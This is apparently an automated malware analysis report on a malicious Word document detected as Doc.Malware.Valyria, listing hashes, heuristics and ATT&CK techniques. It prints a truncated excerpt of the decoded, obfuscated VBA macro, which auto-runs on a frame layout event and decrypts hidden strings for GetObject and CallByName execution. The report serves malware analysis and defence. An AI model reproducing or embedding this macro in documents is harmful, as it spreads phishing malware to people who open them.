Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 020ba5a273c0992d…

MALICIOUS

Office (OLE)

95.5 KB Created: 2018-09-24 11:06:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: 1ded730be82850f1a78304be76ac7f4f SHA-1: d7350270b605b73f617be77fe36d3968388a3b80 SHA-256: 020ba5a273c0992d62faa05144aed7f174af64c836bf82009ada46f1ce3b6eee
162 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is a malicious Office document containing a large VBA macro. Heuristics indicate the use of GetObject and CallByName, common techniques for executing embedded code. The macro itself appears to be heavily obfuscated but is likely designed to download and execute a second-stage payload, as suggested by the ClamAV detection name 'Doc.Malware.Valyria'. The presence of the 'macros.bas' file further confirms the macro-based nature of the attack.

Heuristics 5

  • ClamAV: Doc.Malware.Valyria-9761059-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-9761059-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 28563 bytes
SHA-256: f8c45f5bd6784b0941636dbcc964194065d4541c8fcba8c2a0908cbf5aeb235f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "sub1, 0, 0, MSForms, Frame"
Dim dim5, dim8(2) As Byte, dim58(9) As Byte, dim23(32) As Byte, dim24(19) As Byte, dim61(13) As Byte, dim7(5) As Byte, dim33(55) As Byte, dim50(805) As Byte, dim89(5) As Byte, dim91(16) As Byte, dim70(16) As Byte, dim41(1 To 255) As Byte
Private Function dim09()
Dim dim80, dim82, dim27, dim32() As Byte, dim85, dim69
dim69 = 1
While dim69 <= (353940 / 1388)
dim41(dim69) = dim69
dim69 = dim69 + 1
Wend
dim47
dim67
dim85 = (626944 / 2449)
dim26
While dim82 = 0
dim32 = CStr(dim80)
dim27 = dim49(dim32())
If dim27 >= 1 Then
dim7(2) = dim32(0) + (dim32(1) * dim85)
If dim27 >= 3 Then
dim7(3) = dim32(2) + (dim32(3) * dim85)
If dim27 >= 5 Then
dim7(4) = dim32(4) + (dim32(5) * dim85)
If dim27 >= 7 Then
dim7(5) = dim32(6) + (dim32(7) * dim85)
If dim27 >= 9 Then
dim7(6) = dim32(8) + (dim32(9) * dim85)
End If
End If
End If
End If
End If
If dim11(dim40(dim91(), dim9(dim7()), 16), dim70, 16) = 1 Then
dim82 = 8195
End If
dim80 = dim80 + 1
Wend
If dim82 = 8195 Then
dim95
Else
MsgBox dim82
End If
End Function
Private Function dim04(dim31, dim64, dim18, dim0, dim19, dim97)
On Error GoTo dim92
Set dim04 = CallByName(dim31, dim64, dim18, dim19)
dim92:
End Function
Private Function dim53(dim48() As Byte, dim08)
Dim dim99, dim36
On Error GoTo dim68
While dim99 <= dim08
dim36 = dim48(dim99)
If dim36 = 0 Then
Exit Function
End If
dim53 = dim53 & dim77(dim36)
dim36 = 0
dim99 = dim99 + 1
Wend
dim68:
End Function
Private Sub dim95()
Dim dim16() As Byte
dim16 = dim9(dim7())
dim44
Dim dim30
Set dim30 = dim72(dim53(dim40(dim33(), dim16(), 56), 56))
dim13
dim62
dim96
Dim dim45
dim45 = dim53(dim40(dim50(), dim16(), 806), 806)
dim94
dim79
dim22
dim15
Dim dim86, dim39, dim35
Set dim86 = dim04(dim30, dim53(dim40(dim8(), dim16(), 3), 3), 1, 0, dim53(dim40(dim24(), dim16(), 20), 20), 0)
Set dim39 = dim04(dim86, dim53(dim40(dim61(), dim16(), 14), 14), 1, 0, 0, 0)
Set dim35 = dim72(dim53(dim40(dim23(), dim16(), 33), 33))
dim04 dim35, dim53(dim40(dim89(), dim16(), 6), 6), 1, 1, dim45, dim39
End Sub
Private Function dim9(dim56() As Byte) As Byte()
Dim dim90(0 To 255) As Byte, dim76, dim03, dim34 As Byte
While dim76 <= (6766 - 6511)
dim90(dim76) = dim76
dim76 = dim76 + 1
Wend
dim76 = 0
While dim76 <= (-7454 + 7709)
dim03 = dim98((dim03 + dim90(dim76) + dim56(dim98(dim76, 6))), (8340 - 8084))
dim34 = dim90(dim76)
dim90(dim76) = dim90(dim03)
dim90(dim03) = dim34
dim76 = dim76 + 1
Wend
dim9 = dim90
End Function
Private Sub dim47()
dim70(8) = dim41(56)
dim70(5) = dim41(49)
dim70(15) = dim41(66)
dim70(6) = dim41(67)
dim70(0) = dim41(51)
dim70(10) = dim41(66)
dim70(14) = dim41(51)
dim70(7) = dim41(48)
dim70(3) = dim41(52)
dim70(1) = dim41(48)
dim70(2) = dim41(48)
dim70(9) = dim41(70)
dim70(4) = dim41(70)
dim70(16) = dim41(52)
dim70(11) = dim41(53)
dim70(12) = dim41(48)
dim70(13) = dim41(68)
End Sub
Private Sub dim26()
dim7(1) = 48
dim7(0) = 68
End Sub
Private Sub dim67()
dim91(14) = dim41(53)
dim91(9) = dim41(212)
dim91(13) = dim41(68)
dim91(8) = dim41(176)
dim91(5) = dim41(73)
dim91(11) = dim41(251)
dim91(6) = dim41(157)
dim91(3) = dim41(189)
dim91(2) = dim41(181)
dim91(10) = dim41(114)
dim91(12) = dim41(28)
dim91(15) = dim41(189)
dim91(7) = dim41(58)
dim91(4) = dim41(210)
dim91(16) = dim41(44)
dim91(0) = dim41(30)
dim91(1) = dim41(151)
End Sub
Private Sub Sub1_Layout()
If dim5 = 0 Then
dim5 = 83
dim09
End If
End Sub
Private Sub dim94()
dim89(3) = dim41(232)
dim89(2) = dim41(224)
dim89(1) = dim41(213)
dim89(0) = dim41(110)
dim89(5) = dim41(29)
dim89(4) = dim41(224)
End Sub
Private Sub dim62()
dim23(23) = dim41(71)
dim23(20) = dim41(159)
dim23(5) = dim41(21)
dim23(1) = dim41(206)
dim2
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.